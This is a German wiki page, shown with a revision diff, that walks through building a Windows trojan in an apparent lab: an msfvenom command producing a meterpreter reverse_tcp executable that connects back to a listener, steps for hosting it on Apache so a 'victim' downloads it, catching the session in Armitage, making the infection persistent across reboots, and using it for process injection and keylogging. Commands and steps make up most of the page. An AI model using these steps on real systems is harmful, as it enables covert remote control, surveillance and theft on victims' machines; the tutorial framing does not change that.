Metasploit & armitage trojaner: Unterschied zwischen den Versionen

Aus xinux.net
Zur Navigation springen Zur Suche springen
Zeile 8: Zeile 8:
 
  ip:  192.168.242.76
 
  ip:  192.168.242.76
  
=Trojaner erstellen=
+
=Create trojan=
 
*LHOST="10.81.1.1"
 
*LHOST="10.81.1.1"
 
*LPORT="7777"
 
*LPORT="7777"
Zeile 15: Zeile 15:
  
 
[[Datei:7 trojaner.png]]
 
[[Datei:7 trojaner.png]]
 +
 
=dem opfer das Programm unterschieben=
 
=dem opfer das Programm unterschieben=
 
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an
 
das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

Version vom 2. September 2019, 10:00 Uhr

Setup Hacker

Kali linux
ip:  192.168.242.91

Setup Opfer

Windows 7 Domain Rechner
Benutzer: Admin
ip:  192.168.242.76

Create trojan

  • LHOST="10.81.1.1"
  • LPORT="7777"

LHOST ist der Rechner den der Client spaeter connecten ...

  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=$LPORT --format=exe > program.exe

7 trojaner.png

dem opfer das Programm unterschieben

das opfer muss dazu gebracht werden das Programm auszuführen wir bieten in diesem beispiel einfach die Datei als download an

cp program.exe /var/www/html/
rm /var/www/html/index.html
ifconfig
netstat -lntp
service apache2 restart 


8 opfer.png

auf der opfer Seite

12 schadeware.png

Kontrolle übernehmen

nun starten wir erst metasploit und danach armitage (linke leiste)

Mframe.png

Standard Einstellung beibehalten weitere Meldungen einfach bestätigen

Amriamstarten.png

1armitagestarten.png

wenn armitage gestartet ist erstellen wir einen Server zum lauschen

  • payload
    • windows
      • metapreter

hier passen wir den LPORT an

und warten darauf das sich unser opfer verbindet

nun erscheint oben rechts der opfer Computer

(durch links klick auswählen)

Dauerhaft infizieren

als nächstes wollen wir den Trojaner dauerhaft speichern

wir suchen nach persist (mit Doppelklick auswählen) und geben einen neuen Port an


200persist.png

wen der Computer nun neugestartet wird müssen wir nur auf dem neuen Port lauschen und werden wieder verbunden

diese kann ein par Minuten dauern

Was kann man machen

jetzt gibt es viele Möglichkeiten

  • Rechtsklick infizierter pc
    • meterpreter
      • explore

hier können wir uns Prozesse oder Dateien anzeigen lassen andere Prozesse infizieren oder einen keylogger installieren usw

kurz Beispiel keylogger

metasploit & armitage keylogger